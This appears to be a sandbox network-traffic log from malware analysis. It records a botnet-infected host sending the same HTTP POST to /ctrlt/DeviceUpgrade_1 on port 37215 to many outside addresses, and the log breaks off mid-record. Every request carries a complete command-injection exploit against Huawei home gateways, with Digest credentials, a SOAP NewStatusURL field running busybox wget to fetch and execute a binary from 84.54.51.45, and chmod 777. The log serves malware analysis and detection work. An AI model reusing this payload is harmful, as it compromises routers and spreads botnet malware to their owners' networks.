                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1741192.168.2.1549332197.240.22.19537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.463007927 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1742192.168.2.1548776197.58.147.20837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.463022947 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1743192.168.2.1535956197.91.231.19037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.463046074 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1744192.168.2.1540784197.3.67.14737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.463088989 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1745192.168.2.1544382197.86.80.21537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.463088989 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1746192.168.2.1555042197.115.174.24037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.463124990 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1747192.168.2.1542612197.138.155.10137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.463143110 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1748192.168.2.1553628197.6.96.1237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.463159084 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1749192.168.2.1556156197.211.100.12837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.463159084 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1750192.168.2.1557346197.233.178.22637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.463170052 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 